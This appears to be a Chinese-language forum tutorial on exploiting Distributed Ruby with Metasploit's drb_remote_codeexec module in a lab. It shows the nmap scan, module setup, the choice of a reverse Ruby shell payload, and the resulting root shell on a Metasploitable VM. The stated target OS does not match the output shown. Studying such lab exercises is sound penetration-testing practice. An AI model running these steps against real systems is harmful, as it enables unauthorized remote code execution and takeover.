Metasploit对分布式Ruby进行远程代码执行



  • Metasploit对分布式Ruby进行远程代码执行

    生活中,开发人员和用户每天都会有相似的操作习惯,这往往是黑客最容易利用对攻击目标与突破点。
    我们在开发一款产品,每每都会在便利性和安全性之间进行权衡。
    那么,在分布式Ruby的系统也会存在这样对现象,导致我们使用Metasploit就可以轻松地对其进行测试。

    什么是分布式Ruby?

    什么是分布式?单台计算机的计算能力不足、而又无法使用超级计算机的情况,
    通过多台计算机的累加,把计算量和数据分布到每一台机器上,以达到超级计算机的效果。
    分布式Ruby是Ruby编程语言的分布式对象系统,允许Ruby进程之间的远程方法调用。
    虽然这项技术可以使用灵活的服务来增强某些程序,但如果没有正确实现,就会出现安全漏洞,

    0x01 测试环境

    这里演示,我们的攻击机和靶机都用的是ParrotSecurityOS,
    IP:172.16.1.102
    RubyVersion:ruby 2.0.0p648 (2015-12-16) [x86_64-linux]

    0x02 验证漏洞

    在我们的靶机上运行dRuby。在最初设置dRuby时,它会将自身绑定到特定的URI和端口,
    我们今天演示端口为8787.以便我们可以正确被Nmap扫描。
    使用nmap -sV ip -p 8787 来扫描目标主机和端口上运行的软件的版本并设置端口为8787

    nmap -sV 172.16.1.102 -p 8787
    
    [*] exec: nmap -sV 172.16.1.102 -p 8787
    
    Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-25 18:16 CST
    Nmap scan report for 172.16.1.102
    Host is up (0.0013s latency).
    
    PORT     STATE SERVICE VERSION
    8787/tcp open  drb     Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
    MAC Address: 08:00:27:77:62:6C (Oracle VirtualBox virtual NIC)
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 19.65 seconds
    

    我们可以看到dRuby服务存在并正在运行,接下来掏出我们metasploit漏洞利用

    0x03 漏洞利用

    终端键入msfconsole启动Metasploit ,然后search drb以显示任何匹配的结果。如下:

    msf > search drb
    
    Matching Modules
    ================
    
       Name                                                   Disclosure Date  Rank       Check  Description
       ----                                                   ---------------  ----       -----  -----------
       exploit/linux/misc/drb_remote_codeexec                 2011-03-23       excellent  No     Distributed Ruby Remote Code Execution
       exploit/multi/misc/wireshark_lwres_getaddrbyname       2010-01-27       great      No     Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
       exploit/multi/misc/wireshark_lwres_getaddrbyname_loop  2010-01-27       great      No     Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
    

    我们可以看到drb_remote_codeexec就是我们要找的,233。你可以使用use命令加载漏洞,然后在使用模块的路径。

    msf > use exploit/linux/misc/drb_remote_codeexec
    
    msf exploit(linux/misc/drb_remote_codeexec) > info
    
           Name: Distributed Ruby Remote Code Execution
         Module: exploit/linux/misc/drb_remote_codeexec
       Platform: Unix
           Arch: cmd
     Privileged: No
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2011-03-23
    
    Provided by:
      joernchen <joernchen@phenoelit.de>
    
    Available targets:
      Id  Name
      --  ----
      0   Automatic
      1   Trap
      2   Eval
      3   Syscall
    
    Check supported:
      No
    
    Basic options:
      Name   Current Setting  Required  Description
      ----   ---------------  --------  -----------
      RHOST                   no        The target address
      RPORT  8787             yes       The target port
      URI                     no        The URI of the target host (druby://host:port) (overrides RHOST/RPORT)
    
    Payload information:
      Space: 32768
    
    Description:
      This module exploits remote code execution vulnerabilities in dRuby.
    
    References:
      CVE: Not available
      http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html
      http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/
      http://bugkraut.de/posts/tainting
    

    0x04启动漏洞利用
    设置目标ip,端口

    msf exploit(linux/misc/drb_remote_codeexec) > set rhost 172.16.1.102
    
    rhost => 172.16.1.102
    
    msf exploit(linux/misc/drb_remote_codeexec) > show payloads
    
    Compatible Payloads
    ===================
    
       Name                                Disclosure Date  Rank    Check  Description
       ----                                ---------------  ----    -----  -----------
       cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
       cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
       cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
       cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
       cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
       cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
       cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
       cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
       cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
       cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
       cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
       cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
       cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
       cmd/unix/bind_stub                                   normal  No     Unix Command Shell, Bind TCP (stub)
       cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
       cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
       cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
       cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
       cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
       cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
       cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
       cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
       cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
       cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
       cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
       cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
       cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
       cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
       cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
       cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
       cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
       cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
       cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
       cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
       cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
       cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
       cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
       cmd/unix/reverse_stub                                normal  No     Unix Command Shell, Reverse TCP (stub)
       cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
       generic/custom                                       normal  No     Custom Payload
       generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
       generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
    

    我们选择cmd/unix/reverse_ruby

    msf exploit(linux/misc/drb_remote_codeexec) > set payload cmd/unix/reverse_ruby
    
    payload => cmd/unix/reverse_ruby
    
    msf exploit(linux/misc/drb_remote_codeexec) > options
    
    Module options (exploit/linux/misc/drb_remote_codeexec):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST  172.16.1.102     no        The target address
       RPORT  8787             yes       The target port
       URI                     no        The URI of the target host (druby://host:port) (overrides RHOST/RPORT)
    
    Payload options (cmd/unix/reverse_ruby):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST                   yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    

    设置监听地址

    msf exploit(linux/misc/drb_remote_codeexec) > set lhost 172.16.1.100
    
    lhost => 172.16.1.100
    

    0x05 获取Shell
    直接run

    msf exploit(linux/misc/drb_remote_codeexec) > run
    
    [*] Started reverse TCP handler on 172.16.1.100:4444
    [*] Trying to exploit instance_eval method
    [!] Target is not vulnerable to instance_eval method
    [*] Trying to exploit syscall method
    [*] attempting x86 execve of .JU4AK4Gh3sOBkaB7
    [+] Deleted .JU4AK4Gh3sOBkaB7
    
    whoami
    root
    uname -a
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
    ip address
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
        link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
        inet 127.0.0.1/8 scope host lo
        inet6 ::1/128 scope host
           valid_lft forever preferred_lft forever
    2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
        link/ether 08:00:27:77:62:6c brd ff:ff:ff:ff:ff:ff
        inet 172.16.1.102/12 brd 172.31.255.255 scope global eth0
        inet6 fe80::a00:27ff:fe77:626c/64 scope link
           valid_lft forever preferred_lft forever
    

Log in to reply